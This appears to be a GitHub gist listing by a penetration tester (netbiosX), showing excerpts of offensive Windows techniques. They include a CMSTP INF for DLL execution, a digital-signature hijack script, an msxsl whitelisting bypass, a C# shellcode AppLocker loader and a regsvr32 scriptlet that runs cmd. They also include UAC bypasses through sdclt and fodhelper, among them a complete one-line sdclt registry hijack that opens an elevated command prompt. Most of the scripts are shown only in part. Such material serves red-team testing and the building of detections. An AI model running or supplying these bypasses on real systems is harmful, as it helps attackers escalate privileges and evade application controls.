@netbiosX
netbiosX / pentestlab-dll.inf
Created May 7, 2018
CMSTP - Arbitrary DLL execution locally and remotely and SCT for AppLocker Bypass
View pentestlab-dll.inf
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection
[RegisterOCXSection]
C:\Users\test.PENTESTLAB\pentestlab.dll
@netbiosX
netbiosX / DigitalSignature-Hijack.ps1
Last active May 23, 2019
Hijack Digital Signatures and Bypass Authenticode Hash Validation
View DigitalSignature-Hijack.ps1
<#
DigitalSignatureHijack v1.0
License: GPLv3
Author: @netbiosX
#>
# Validate Digital Signature for PowerShell Scripts
function ValidateSignaturePS
{
$ValidateHashFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' +'\OID\EncodingType 0\CryptSIPDllVerifyIndirectData'
@netbiosX
netbiosX / customers.xml
Created Jul 5, 2017
Bypass Application Whitelisting via msxsl binary
View customers.xml
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="script.xsl" ?>
<customers>
<customer>
<name>Microsoft</name>
</customer>
</customers>
@netbiosX
netbiosX / Sdclt.ps1
Last active Jul 31, 2019
Bypass UAC via sdclt in Windows 10 systems
View Sdclt.ps1
<#
.SYNOPSIS
This script can bypass User Account Control (UAC) via sdclt.exe for Windows 10.
Author: @netbiosX
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
 
It creates a registry key in: "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" to perform UAC bypass
@netbiosX
netbiosX / sdclt.bat
Created Jun 9, 2017
UAC Bypass in Windows 10 via sdclt - batch version
View sdclt.bat
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "C:\Windows\System32\cmd.exe" /f && START /W C:\Windows\System32\sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f
@netbiosX
netbiosX / FodhelperUACBypass.ps1
Last active Sep 22, 2019
Bypass UAC via Fodhelper binary in Windows 10 systems
View FodhelperUACBypass.ps1
<#
.SYNOPSIS
This script can bypass User Account Control (UAC) via fodhelper.exe
 
It creates a new registry structure in: "HKCU:\Software\Classes\ms-settings\" to perform UAC bypass and starts
an elevated command prompt.
 
.NOTES
Function : FodhelperUACBypass
File Name : FodhelperUACBypass.ps1
@netbiosX
netbiosX / Shellcode.cs
Created Jun 6, 2017
C# file that contains shellcode and bypasses AppLocker via Assembly Load
View Shellcode.cs
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
 
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
@netbiosX
netbiosX / pentestlab.sct
Created May 10, 2017
AppLocker - Regsvr32
View pentestlab.sct
<?XML version="1.0"?>
<scriptlet>
<registration
progid="Pentest"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - @netbiosX -->
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd /k cd c:\ & pentestlab.exe");